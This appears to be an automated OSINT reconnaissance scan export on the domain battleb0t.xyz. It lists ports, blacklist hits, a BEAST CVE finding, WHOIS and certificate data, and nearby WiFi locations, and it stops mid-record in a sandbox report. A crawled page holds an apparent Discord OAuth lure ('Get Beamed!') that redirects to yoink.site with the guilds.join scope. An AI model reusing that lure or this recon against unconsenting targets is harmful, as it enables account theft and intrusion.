| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.187): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:41 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | 188.114.97.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CMMC (Net ID: 00:02:6F:DF:89:25) | 32.8608, -79.9746 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007jedgar.github.io | 185.199.111.153 |
| 2023-05-12 02:58:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | | 34.74.170.74 |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:8443 | 188.114.96.0/24 |
| 2023-05-12 03:09:58 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.112 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | toyhou.se (Category: hobby)
https://toyhou.se/login | login |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-14n.github.io | 185.199.111.153 |
| 2023-05-12 02:54:18 | Web Content | No | Web Spider | 7 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
| pics.battleb0t.xyz |
| 2023-05-12 02:49:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d8:ac:1a:31:df:8f:f8:c7:c3:27:35:9c:31:39:5f:60:e8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:22 2022 GMT
Not After : Feb 15 17:26:21 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D4:B4:B6:D6:64:7B:5F:1F:0F:AA:DA:BE:7B:F2:3E:AB:24:EE:4D:D7
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 18:26:23.061 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:9F:03:F2:57:29:1C:6C:CA:C4:B6:84:
A2:CF:DC:58:71:8F:BE:81:45:60:1F:FF:93:71:3F:A9:
CA:BA:3A:50:C4:02:21:00:90:64:F6:9F:F7:D4:4C:D2:
FE:1C:A7:11:20:05:5D:56:39:91:0A:7B:4C:62:39:AA:
64:BD:6C:3C:C2:FD:A1:0A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Nov 17 18:26:23.103 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:4F:62:25:1A:58:98:9D:A9:66:2A:8C:9C:
A9:99:81:EC:02:DA:B6:46:5C:1C:8A:B1:7D:3E:50:EB:
79:AD:CA:D4:02:21:00:81:0A:60:C2:7A:18:38:E9:6B:
5A:5E:9B:C3:73:2D:B9:E6:6F:7E:07:33:77:3C:F6:0E:
B6:F2:86:95:8C:EA:B2
Signature Algorithm: sha256WithRSAEncryption
0b:32:93:ac:90:bf:47:b0:c4:55:e2:5d:67:21:f0:7b:a7:a4:
cd:66:48:4d:2c:f0:72:c8:d2:e0:06:52:3d:5f:5e:f3:6d:c2:
a4:d3:6b:9f:de:a7:3e:43:94:31:d9:2a:70:b4:d8:61:f6:f9:
5c:2f:4e:93:c9:e9:4f:53:93:2f:86:7b:1f:c9:8a:15:03:28:
96:52:6d:95:ef:a6:c5:d3:5e:db:a3:1b:da:98:f0:b3:d4:33:
b3:0c:25:74:63:ab:88:aa:ca:72:4f:f1:60:47:12:0c:e7:e7:
d2:30:3a:7a:16:b2:67:3a:08:9a:8f:2c:01:80:2f:d2:f1:29:
79:da:43:5d:f1:6e:ce:77:99:33:0f:bd:15:e0:aa:92:a8:51:
21:1e:1f:fc:62:be:58:aa:ad:ce:bf:14:e5:e6:0f:6c:ea:61:
2e:ce:4c:21:48:67:57:3a:f8:75:60:b1:d3:01:c6:eb:1e:96:
48:d4:7d:65:31:de:70:bc:f7:3f:bd:89:d2:15:4c:60:09:1a:
af:c6:86:cb:88:cd:d5:a5:55:42:cd:bd:22:96:61:43:7d:a3:
c6:84:39:52:19:c9:4c:63:fc:ed:7f:7b:3f:3c:68:62:f5:7a:
29:d5:7a:58:55:09:bd:cb:a0:f7:ad:61:48:d5:d6:97:fb:49:
c3:ed:97:11
| battleb0t.xyz |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0101dd.github.io]
https://www.openphish.com/feed.txt | 0101dd.github.io |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.252): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8001::153 | www.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | P A L M N E T (Net ID: 00:01:71:0A:04:85) | 52.3759, 4.8975 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2087 | 188.114.96.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Wireclub (Category: social)
https://www.wireclub.com/users/login | login |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:4D:A9:54) | 40.2024, 29.0398 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Iceland | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CLFPrivate (Net ID: 00:02:6F:B9:C7:0C) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | https://battleb0t.xyz/ | www.battleb0t.xyz |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.83 | 34.74.170.74 |
| 2023-05-12 02:45:40 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco (South Beach)', u'security': {u'is_vpn': False}, u'city_geoname_id': 5326621, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -118.244, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:39'}, u'latitude': 34.0544, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.111.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.111.153 |
| 2023-05-12 02:57:47 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 15, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://optus-equifax.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5488:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5488:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7156:120:WilError_01"\n "Local\\SM0:7156:304:WilStaging_02"\n "Local\\SM0:5488:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5488:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5772:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': 
u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\5488_430541408\\Part-RU]- [targetUID: 00000000-00005488]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00005488]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00005488]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5488_1156268761\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005488]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\5488_430541408\\Part-RU]- [targetUID: 00000000-00005488]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005488]\n "4f160014-68b9-44d4-b7a6-3f79110de750.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4f160014-68b9-44d4-b7a6-3f79110de750.tmp]- [targetUID: 00000000-00005488]\n "8ceb1266-4885-4645-b411-7bc7dd0de9c7.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\8ceb1266-4885-4645-b411-7bc7dd0de9c7.tmp]- 
[targetUID: 00000000-00005488]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00005488]\n "628fc9da-b324-41b9-81c8-5c3463af84f8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\628fc9da-b324-41b9-81c8-5c3463af84f8.tmp]- [targetUID: 00000000-00005488]\n "Part-ZH" has type "data"- Location: [%TEMP%\\5488_430541408\\Part-ZH]- [targetUID: 00000000-00005488]\n "a8e1fd7d-aa4e-4722-b19c-f21bb7f821ad.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a8e1fd7d-aa4e-4722-b19c-f21bb7f821ad.tmp]- [targetUID: 00000000-00005488]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005488]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.24\\Ruleset Data]- [targetUID: 00000000-00005488]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00005488]\n "4a885ded-eb9a-4f27-8dc1-8665d4f15f6c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4a885ded-eb9a-4f27-8dc1-8665d4f15f6c.tmp]- [targetUID: 00000000-00005488]\n "0179aead-0dda-4e52-8e23-8fe040344942.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\0179aead-0dda-4e52-8e23-8fe040344942.tmp]- [targetUID: 00000000-00005016]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.fingerprint]- [targetUID: 00000000-00005488]\n "1355abef-4c0f-45ce-aac0-8be051cd890d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\1355abef-4c0f-45ce-aac0-8be051cd890d.tmp]- [targetUID: 00000000-00005488]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5488_1156268761\\shoppingfre.js]- [targetUID: 00000000-00005488]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.html]- [targetUID: 00000000-00005488]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://optus-equifax.netlify.app/"\n Pattern match: "https://optus-equifax.netlify.app"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_confirmation_page_validator.js" - Location: 
[%TEMP%\\5488_1156268761\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005488]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5488_1156268761\\shoppingfre.js]- [targetUID: 00000000-00005488]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5488_430541408\\adblock_snippet.js]- [targetUID: 00000000-00005488]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5488_1156268761\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005488]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5488_1156268761\\shopping_iframe_driver.js]- [targetUID: 00000000-00005488]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5488_1156268761\\product_page.js]- [targetUID: 00000000-00005488]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5488_1156268761\\auto_open_controller.js]- [targetUID: 00000000-00005488]\n 